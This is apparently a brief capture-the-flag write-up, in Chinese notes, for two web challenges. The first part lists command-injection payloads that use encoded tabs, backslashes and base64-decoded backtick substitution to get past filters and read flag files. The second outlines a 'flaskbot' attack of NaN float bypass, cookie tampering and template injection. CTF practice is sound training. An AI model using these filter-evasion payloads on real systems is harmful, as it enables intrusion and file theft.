1%09
%09ls%09/
1%09
%09ca\t%09in\dex.p\hp时有个闪
1%09
find%09/%09-name%09`echo%09ZmxhKg==
base64%09-d`
找flag
1%09
ca\t%09/`echo%09LV0Yy8uZmluZGZsYWcvZmxhZy50eHQ=
base64%09-d`
★flaskbot写名字
发现要绕float,直接nan绕过
发现cookie,base64解码就是刚刚输的用户名
随便改一个用户名
输入什么输出什么,那我直接模板注入
读文件报错debug发现是python的东西,然后一直翻资料,后来翻到之前写的一道题